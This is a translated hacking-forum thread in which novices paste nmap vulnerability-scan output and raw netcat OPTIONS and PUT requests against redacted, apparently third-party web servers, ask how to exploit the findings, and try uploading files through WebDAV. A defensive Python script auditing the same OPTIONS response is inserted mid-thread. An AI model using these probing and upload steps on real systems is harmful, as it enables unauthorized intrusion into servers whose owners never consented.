HTTP ATTACK
#31
(05-27-2012, 02:47 AM)nesta Wrote: mine doesn't even run, bro

Code:
nesta@Tengtop:~$ nc -vv xxx.ac.id
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
      [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
      [-x proxy_address[:port]] [hostname] [port[s]]
nesta@Tengtop:~$

even though I've already installed netcat :(

I used to get this too. If I'm not mistaken the netcat version is different, that one is the FreeBSD one; try installing nc.traditional, bro :D

#32
wow, that's pretty scary, bro :D permission to practice..

Hacking For Security | Different Realm, Different Afterlife.

#33
bro... I want to ask something..
I just scanned a target with nmap..
and it gave output like this..
Code:
nmap -Pn --script=vuln -T3 xxx.xxx.xxx.xxx

Starting Nmap 6.25 ( http://nmap.org ) at 2013-07-01 23:10 WIT
Nmap scan report for xxx.xxx.xxx.xxx
Host is up (1.4s latency).
Not shown: 935 filtered ports, 59 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
80/tcp   open  http
|_http-frontpage-login: false
222/tcp  open  rsh-spx
8000/tcp open  http-alt
|_http-frontpage-login: false
|_http-git: 0
|_http-huawei-hg5xx-vuln: false
| http-litespeed-sourcecode-download:
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <HTML><HEAD><TITLE>SHOUTcast Server</TITLE></HEAD><BODY><H3>Invalid resource</H3>
|_</BODY></HTML>
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-method-tamper:
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|     Description:
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|              
|     Extra information:
|      
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     /admin.cgi [HEAD]
|  
|     References:
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|       http://capec.mitre.org/data/definitions/274.html
|_      http://www.mkit.com.ar/labs/htexploit/
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: VULNERABLE
|     Description:
|       Slowloris tries to keep many connections to the target web server open and hold them open as long as possible.
|       It accomplishes this by opening connections to the target web server and sending a partial request. By doing
|       so, it starves the http server's resources causing Denial Of Service.
|               
|     Disclosure date: 2009-09-17
|     References:
|_      http://ha.ckers.org/slowloris/
|_http-vuln-cve2010-0738: false
8001/tcp open  vcom-tunnel
8080/tcp open  http-proxy
| http-enum:
|_  /phpmyadmin/: phpMyAdmin
|_http-frontpage-login: false
| http-vuln-cve2011-3192:
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  OSVDB:74721
|     Description:
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       http://osvdb.org/74721
|       http://nessus.org/plugins/index.php?view=single&id=55976
|_      http://seclists.org/fulldisclosure/2011/Aug/175
| http-vuln-cve2011-3368:
|_  ERROR: Got no answers from pipelined queries

Host script results:
|_firewall-bypass: false
so how do you exploit that, bro?? some of them are vulnerable, right...
help me out, bro... :-bd

#34
great stuff, bro :) hope it's useful for me :)
hehehhehehe

#35
new user-->is me
Keep it up, bro..
Never get tired of sharing knowledge..
:)

#36
thx for sharing, bro, I've tried it, this is what I got

Code:
root@m1+5c:~# nc -vv xxx.xxx.xxx.xxx 80
xxx.xxx.xxx.xxx: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [xxx.xxx.xxx.xxx] 80 (www) open
OPTIONS / HTTP/1.1
Host: xxx.xxx.xxx.xxx

HTTP/1.1 200 OK
Date: Mon, 19 Aug 2013 10:41:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

then I tried PUT, here's the result
Code:
root@m1+5c:~# nc -vv xxx.xxx.xxx.xxx 80
xxx.xxx.xxx.xxx: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [xxx.xxx.xxx.xxx] 80 (www) open
PUT /test.txt HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 10
xxxxxxxxxx  
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Mon, 19 Aug 2013 11:00:38 GMT
Connection: close
Content-Length: 42

<h1>Bad Request (Invalid Header Name)</h1> sent 74, rcvd 171

so, what's wrong there, bro? also, how do we find out whether that directory has permission 777 or not?
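
Added example (not part of any post in this thread): a server owner's reading of the OPTIONS response quoted in post #36, in Python. It separates the methods the server advertises overall (Public) from those permitted on the requested URL (Allow) and flags WebDAV write methods and TRACE; the response is a trimmed copy of the one above, and the two method lists used as policy are assumptions of this example.

```python
# Trimmed copy of the OPTIONS response quoted in post #36 (host was already redacted).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "MS-Author-Via: DAV\r\n"
    "DAV: 1, 2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "\r\n"
)

# Assumed policy for this example: methods a read-only web site does not need.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
DIAGNOSTIC_METHODS = {"TRACE"}


def parse_headers(raw):
    """Return (status_line, {lowercased-name: value}) from a raw HTTP response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # not a "Name: value" line, skip it
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def method_set(value):
    """Split a comma-separated method list into an upper-cased set."""
    return {m.strip().upper() for m in value.split(",") if m.strip()}


def audit_options(raw):
    """Summarise which risky methods an OPTIONS response advertises."""
    _, h = parse_headers(raw)
    public = method_set(h.get("public", ""))  # supported by the server as a whole
    allow = method_set(h.get("allow", ""))    # permitted on the requested URL
    return {
        "webdav_enabled": "dav" in h,
        "write_on_resource": sorted(allow & WRITE_METHODS),
        "write_server_only": sorted((public - allow) & WRITE_METHODS),
        "diagnostic": sorted((public | allow) & DIAGNOSTIC_METHODS),
    }


if __name__ == "__main__":
    for key, value in audit_options(SAMPLE_RESPONSE).items():
        print(f"{key}: {value}")
```

On a site that needs no remote authoring, the goal is for every list to come back empty and `webdav_enabled` to be False.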

#37
Nice Info bro... :D

★Greetings From the Land of Minang★

#38
after I type OPTIONS bla..bla..bla all that comes out is
sent 37, rcvd 406, why is that, bro? hehehe

#39
hmmmm just following along for now, haven't tried it yet >_<

#40
thanks, bro, quite helpful \m/\m/\m/\m/\m/ :-bd:-bd:-bd:-bd:-bd:-bd





